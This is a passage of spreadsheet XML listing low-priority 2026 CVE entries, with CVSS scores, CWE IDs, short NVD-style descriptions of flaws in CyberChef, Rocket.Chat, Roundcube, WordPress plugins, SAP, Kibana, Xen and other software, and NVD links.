          <t>CyberChef is a web app for encryption, encoding, compression, and data analysis. Prior to 11.3.0, CyberChef's pretty-recipe parser in src/core/Utils.mjs can exhaust client-side CPU when a malformed #recipe= URL fragment containing a large number of unmatched quote characters reaches Utils.parseRecipeConfig(). The function synchronously applies a complex global regular expression that may perform heavy backtracking before rejecting the input, causing the victim's browser tab to freeze during startup for seconds or longer. No code execution, data exfiltration, or privilege escalation occurs. This issue is fixed in version 11.3.0.</t>
        </is>
      </c>
      <c r="M5648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72912</t>
        </is>
      </c>
    </row>
    <row r="5649">
      <c r="A5649" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72919</t>
        </is>
      </c>
      <c r="C5649" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5649" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5649" s="5" t="inlineStr"/>
      <c r="F5649" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5649" s="5" t="inlineStr"/>
      <c r="H5649" s="5" t="inlineStr"/>
      <c r="I5649" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J5649" s="5" t="inlineStr"/>
      <c r="K5649" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5649" s="5" t="inlineStr">
        <is>
          <t>Rocket.Chat is an open-source, secure, fully customizable communications platform. Prior to 7.10.14, 8.0.8, 8.1.7, 8.2.7, 8.3.7, 8.4.5, 8.5.2, and 8.6.1, the channels.convertToTeam REST endpoint allows an authenticated registered user with the create-team permission to convert an unrelated public channel by supplying channelName instead of channelId because the edit-room permission is checked only for channelId. This issue is fixed in versions 7.10.14, 8.0.8, 8.1.7, 8.2.7, 8.3.7, 8.4.5, 8.5.2, and 8.6.1.</t>
        </is>
      </c>
      <c r="M5649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72919</t>
        </is>
      </c>
    </row>
    <row r="5650">
      <c r="A5650" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73019</t>
        </is>
      </c>
      <c r="C5650" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5650" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5650" s="5" t="inlineStr"/>
      <c r="F5650" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G5650" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5650" s="5" t="inlineStr"/>
      <c r="I5650" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5650" s="5" t="inlineStr"/>
      <c r="K5650" s="5" t="inlineStr">
        <is>
          <t>CWE-41</t>
        </is>
      </c>
      <c r="L5650" s="5" t="inlineStr">
        <is>
          <t>Improper resolution of path equivalence in Windows URL Moniker allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M5650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73019</t>
        </is>
      </c>
    </row>
    <row r="5651">
      <c r="A5651" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73301</t>
        </is>
      </c>
      <c r="C5651" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5651" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5651" s="5" t="inlineStr"/>
      <c r="F5651" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5651" s="5" t="inlineStr"/>
      <c r="H5651" s="5" t="inlineStr"/>
      <c r="I5651" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5651" s="5" t="inlineStr"/>
      <c r="K5651" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5651" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.39.25, the GET /api/global/groups endpoint in packages/worker/src/api/routes/global/groups.ts omitted auth.builderOrAdmin, allowing an authenticated BASIC role user to enumerate tenant groups, role mappings and user memberships, builder permissions, and default-group flags. The disclosure exposes the tenant access-control structure to users who are not builders or administrators. This issue is fixed in version 3.39.25.</t>
        </is>
      </c>
      <c r="M5651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73301</t>
        </is>
      </c>
    </row>
    <row r="5652">
      <c r="A5652" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74248</t>
        </is>
      </c>
      <c r="C5652" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5652" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5652" s="5" t="inlineStr"/>
      <c r="F5652" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5652" s="5" t="inlineStr"/>
      <c r="H5652" s="5" t="inlineStr"/>
      <c r="I5652" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J5652" s="5" t="inlineStr"/>
      <c r="K5652" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5652" s="5" t="inlineStr">
        <is>
          <t>OpenStack Octavia through 18.0.0 mishandles quality of service (QoS) policy authorization. By associating another project's QoS policy with an amphora, an authenticated user may prevent deletion of that policy. All Octavia deployments are affected.</t>
        </is>
      </c>
      <c r="M5652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74248</t>
        </is>
      </c>
    </row>
    <row r="5653">
      <c r="A5653" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75004</t>
        </is>
      </c>
      <c r="C5653" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5653" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5653" s="5" t="inlineStr"/>
      <c r="F5653" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5653" s="5" t="inlineStr"/>
      <c r="H5653" s="5" t="inlineStr">
        <is>
          <t>roundcube:webmail</t>
        </is>
      </c>
      <c r="I5653" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J5653" s="5" t="inlineStr"/>
      <c r="K5653" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L5653" s="5" t="inlineStr">
        <is>
          <t>In Roundcube Webmail before 1.6.18 and 1.7.x before 1.7.3, improper rule name quoting could lead to managesieve_disabled_actions setting bypass via a crafted rule name in a Sieve script. This issue only affects Roundcube instances using the managesieve plugin.</t>
        </is>
      </c>
      <c r="M5653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75004</t>
        </is>
      </c>
    </row>
    <row r="5654">
      <c r="A5654" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75010</t>
        </is>
      </c>
      <c r="C5654" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5654" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5654" s="5" t="inlineStr"/>
      <c r="F5654" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5654" s="5" t="inlineStr"/>
      <c r="H5654" s="5" t="inlineStr">
        <is>
          <t>roundcube:webmail</t>
        </is>
      </c>
      <c r="I5654" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J5654" s="5" t="inlineStr"/>
      <c r="K5654" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="L5654" s="5" t="inlineStr">
        <is>
          <t>In Roundcube Webmail before 1.6.18 and 1.7.x before 1.7.3, the modoboa driver of the password plugin could leak a Modoboa API authentication token to a user-controlled host via crafted session data. This issue only affects Roundcube instances using the password plugin with its modoboa driver.</t>
        </is>
      </c>
      <c r="M5654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75010</t>
        </is>
      </c>
    </row>
    <row r="5655">
      <c r="A5655" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75018</t>
        </is>
      </c>
      <c r="C5655" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5655" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5655" s="5" t="inlineStr"/>
      <c r="F5655" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5655" s="5" t="inlineStr"/>
      <c r="H5655" s="5" t="inlineStr"/>
      <c r="I5655" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5655" s="5" t="inlineStr"/>
      <c r="K5655" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5655" s="5" t="inlineStr">
        <is>
          <t>The Custom Contact Forms plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 7.16. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with contributor-level access and above, to permanently force-delete arbitrary posts of any post type (including pages, administrator-authored posts, and WooCommerce products) and write arbitrary ccf_field_* post meta onto any post regardless of ownership or post type. The top-level form ID is checked via edit_post/publish_posts, but the nested fields[].ID and choices[].ID paths processed by _create_and_map_fields() and _create_and_map_choices() carry no equivalent capability or post-type guard, leaving those sinks fully exposed while delete_item() and delete_submission() contain explicit post-type restriction fixes demonstrating the developer's awareness of scoping requirements.</t>
        </is>
      </c>
      <c r="M5655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75018</t>
        </is>
      </c>
    </row>
    <row r="5656">
      <c r="A5656" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75601</t>
        </is>
      </c>
      <c r="C5656" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5656" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5656" s="5" t="inlineStr"/>
      <c r="F5656" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5656" s="5" t="inlineStr"/>
      <c r="H5656" s="5" t="inlineStr"/>
      <c r="I5656" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J5656" s="5" t="inlineStr"/>
      <c r="K5656" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L5656" s="5" t="inlineStr">
        <is>
          <t>Static Web Server (SWS) is a production-ready web server suitable for static web files or assets. Through 2.43.0, instances with both basic-auth and metrics features enabled process the /metrics endpoint before the basic-auth check in src/handler.rs, allowing an unauthenticated remote attacker to retrieve Prometheus metrics that disclose virtual host names, request volumes, error rates, latency distributions, and active connections. This issue is fixed in version 2.44.0.</t>
        </is>
      </c>
      <c r="M5656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75601</t>
        </is>
      </c>
    </row>
    <row r="5657">
      <c r="A5657" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75905</t>
        </is>
      </c>
      <c r="C5657" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5657" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5657" s="5" t="inlineStr"/>
      <c r="F5657" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5657" s="5" t="inlineStr"/>
      <c r="H5657" s="5" t="inlineStr"/>
      <c r="I5657" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5657" s="5" t="inlineStr"/>
      <c r="K5657" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5657" s="5" t="inlineStr">
        <is>
          <t>The WP Recipe Maker plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 10.8.0. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with contributor-level access and above, to take ownership of any admin-authored recipe by rewriting its post_author to the attacker's user ID, and unpublish it by overwriting its post_status with the contributor's draft or pending post status. This requires the default 'recipe_use_author' setting to be set to 'parent' for the ownership transfer to occur, though unpublishing remains possible regardless of this setting.</t>
        </is>
      </c>
      <c r="M5657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75905</t>
        </is>
      </c>
    </row>
    <row r="5658">
      <c r="A5658" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76962</t>
        </is>
      </c>
      <c r="C5658" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5658" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5658" s="5" t="inlineStr"/>
      <c r="F5658" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5658" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H5658" s="5" t="inlineStr"/>
      <c r="I5658" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5658" s="5" t="inlineStr"/>
      <c r="K5658" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5658" s="5" t="inlineStr">
        <is>
          <t>SAP S/4HANA (Manage Bank Chains app) does not perform sufficient authorization checks within certain affected functionality. An attacker with low privileges could send specially crafted requests to delete specific entries that should not be accessible to them. This results in a low impact on availability. There is no impact on confidentiality and integrity.</t>
        </is>
      </c>
      <c r="M5658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76962</t>
        </is>
      </c>
    </row>
    <row r="5659">
      <c r="A5659" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76963</t>
        </is>
      </c>
      <c r="C5659" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5659" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5659" s="5" t="inlineStr"/>
      <c r="F5659" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5659" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H5659" s="5" t="inlineStr"/>
      <c r="I5659" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5659" s="5" t="inlineStr"/>
      <c r="K5659" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5659" s="5" t="inlineStr">
        <is>
          <t>Due to a missing authorization check in Application Server ABAP of SAP NetWeaver and ABAP Platform, an authenticated attacker could gain unauthorized access to sensitive system configuration information. Successful exploitation could result in exposure of security relevant settings and internal system details, resulting in low impact on confidentiality while integrity and availability remain unaffected.</t>
        </is>
      </c>
      <c r="M5659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76963</t>
        </is>
      </c>
    </row>
    <row r="5660">
      <c r="A5660" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76977</t>
        </is>
      </c>
      <c r="C5660" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5660" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5660" s="5" t="inlineStr"/>
      <c r="F5660" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5660" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H5660" s="5" t="inlineStr"/>
      <c r="I5660" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5660" s="5" t="inlineStr"/>
      <c r="K5660" s="5" t="inlineStr">
        <is>
          <t>CWE-1289</t>
        </is>
      </c>
      <c r="L5660" s="5" t="inlineStr">
        <is>
          <t>SAP UI5 does not sufficiently validate the parent frame's origin against the configured allowlist. An unauthenticated attacker could host a malicious page to bypass framing restrictions. If an authenticated victim visits the attacker's page and interacts with it, the attacker could trick the victim into performing unintended actions, resulting in a low impact on integrity. There is no impact on confidentiality and availability.</t>
        </is>
      </c>
      <c r="M5660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76977</t>
        </is>
      </c>
    </row>
    <row r="5661">
      <c r="A5661" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77352</t>
        </is>
      </c>
      <c r="C5661" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5661" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5661" s="5" t="inlineStr"/>
      <c r="F5661" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5661" s="5" t="inlineStr"/>
      <c r="H5661" s="5" t="inlineStr"/>
      <c r="I5661" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5661" s="5" t="inlineStr"/>
      <c r="K5661" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5661" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. From version 2.0.0 to before version 5.0.0, any authenticated Wallos user (no admin rights required) can make the server open arbitrary outbound SMTP connections to internal/link-local addresses, by setting the SMTP host of their personal email notifications to an internal IP. The per-user notification settings endpoint (endpoints/notifications/saveemailnotifications.php) performs no SSRF validation, and the notification cron (endpoints/cronjobs/sendnotifications.php) feeds that user-controlled host straight into PHPMailer ($mail-&gt;Host = $email['smtpAddress']). When the user's subscription notification fires, the server connects to the chosen host:port. This issue has been patched in version 5.0.0.</t>
        </is>
      </c>
      <c r="M5661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77352</t>
        </is>
      </c>
    </row>
    <row r="5662">
      <c r="A5662" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78455</t>
        </is>
      </c>
      <c r="C5662" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5662" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5662" s="5" t="inlineStr"/>
      <c r="F5662" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5662" s="5" t="inlineStr"/>
      <c r="H5662" s="5" t="inlineStr"/>
      <c r="I5662" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5662" s="5" t="inlineStr"/>
      <c r="K5662" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5662" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Xbox allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="M5662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78455</t>
        </is>
      </c>
    </row>
    <row r="5663">
      <c r="A5663" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78516</t>
        </is>
      </c>
      <c r="C5663" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5663" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5663" s="5" t="inlineStr"/>
      <c r="F5663" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5663" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H566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663" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5663" s="5" t="inlineStr"/>
      <c r="K5663" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L5663" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Storage allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="M5663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78516</t>
        </is>
      </c>
    </row>
    <row r="5664">
      <c r="A5664" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78593</t>
        </is>
      </c>
      <c r="C5664" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5664" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5664" s="5" t="inlineStr"/>
      <c r="F5664" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5664" s="5" t="inlineStr">
        <is>
          <t>elasticsearch</t>
        </is>
      </c>
      <c r="H5664" s="5" t="inlineStr"/>
      <c r="I5664" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5664" s="5" t="inlineStr"/>
      <c r="K5664" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L5664" s="5" t="inlineStr">
        <is>
          <t>An insufficiently validated configuration field in Kibana's Cribl integration allows an authenticated user holding Kibana Fleet management privileges to inject attacker-controlled expressions into a server-side script template, resulting in an Elasticsearch ingest pipeline being written beyond the caller's authorized Elasticsearch permissions.</t>
        </is>
      </c>
      <c r="M5664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78593</t>
        </is>
      </c>
    </row>
    <row r="5665">
      <c r="A5665" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78595</t>
        </is>
      </c>
      <c r="C5665" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5665" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5665" s="5" t="inlineStr"/>
      <c r="F5665" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5665" s="5" t="inlineStr"/>
      <c r="H5665" s="5" t="inlineStr"/>
      <c r="I5665" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5665" s="5" t="inlineStr"/>
      <c r="K5665" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5665" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization in Kibana Leading to Information Disclosure / Missing Authorization (CWE-862) in the Kibana Fleet feature can lead to information disclosure via Privilege Abuse (CAPEC-122). An authenticated user holding read-level Fleet agent privileges in one Kibana space could enumerate agent metadata and access diagnostic content belonging to agents enrolled in other Kibana spaces.</t>
        </is>
      </c>
      <c r="M5665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78595</t>
        </is>
      </c>
    </row>
    <row r="5666">
      <c r="A5666" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78596</t>
        </is>
      </c>
      <c r="C5666" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5666" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5666" s="5" t="inlineStr"/>
      <c r="F5666" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5666" s="5" t="inlineStr"/>
      <c r="H5666" s="5" t="inlineStr"/>
      <c r="I5666" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5666" s="5" t="inlineStr"/>
      <c r="K5666" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5666" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization in Kibana Leading to Unauthorized Modification of Data / Missing Authorization (CWE-862) in Kibana can lead to unauthorized modification of data via Privilege Abuse (CAPEC-122). An authenticated user holding Security read-level access in a single Kibana space could trigger Entity Analytics migration operations that perform privileged writes across all Kibana spaces, regardless of that user's actual access scope.</t>
        </is>
      </c>
      <c r="M5666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78596</t>
        </is>
      </c>
    </row>
    <row r="5667">
      <c r="A5667" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79515</t>
        </is>
      </c>
      <c r="C5667" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5667" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5667" s="5" t="inlineStr"/>
      <c r="F5667" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5667" s="5" t="inlineStr"/>
      <c r="H5667" s="5" t="inlineStr"/>
      <c r="I5667" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5667" s="5" t="inlineStr"/>
      <c r="K5667" s="5" t="inlineStr"/>
      <c r="L5667" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read in the stbtt_GetGlyphShape component of nothings stb commit 31c1ad3 allows attackers to cause a Denial of Service (DoS) via sending a crafted TTF file.</t>
        </is>
      </c>
      <c r="M5667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79515</t>
        </is>
      </c>
    </row>
    <row r="5668">
      <c r="A5668" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79588</t>
        </is>
      </c>
      <c r="C5668" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5668" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5668" s="5" t="inlineStr"/>
      <c r="F5668" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5668" s="5" t="inlineStr"/>
      <c r="H5668" s="5" t="inlineStr"/>
      <c r="I5668" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5668" s="5" t="inlineStr"/>
      <c r="K5668" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="L5668" s="5" t="inlineStr">
        <is>
          <t>U-speed WIFI4 N300 T1 Pro v1.0.0 is vulnerable to Cleartext transmission of administration credentials over HTTP.</t>
        </is>
      </c>
      <c r="M5668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79588</t>
        </is>
      </c>
    </row>
    <row r="5669">
      <c r="A5669" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79603</t>
        </is>
      </c>
      <c r="C5669" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5669" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5669" s="5" t="inlineStr"/>
      <c r="F5669" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5669" s="5" t="inlineStr"/>
      <c r="H5669" s="5" t="inlineStr"/>
      <c r="I5669" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5669" s="5" t="inlineStr"/>
      <c r="K5669" s="5" t="inlineStr">
        <is>
          <t>CWE-664</t>
        </is>
      </c>
      <c r="L5669" s="5" t="inlineStr">
        <is>
          <t>x86 PV guests can free memory pages while still keeping a stale TLB entry
pointing to them.  A TLB flush is only issued by Xen (if needed) when the
page is re-used.  Since it's possible for the page to be scrubbed ahead of
the TLB flush, there's a window where a PV guest can modify an already
scrubbed page.</t>
        </is>
      </c>
      <c r="M5669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79603</t>
        </is>
      </c>
    </row>
    <row r="5670">
      <c r="A5670" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
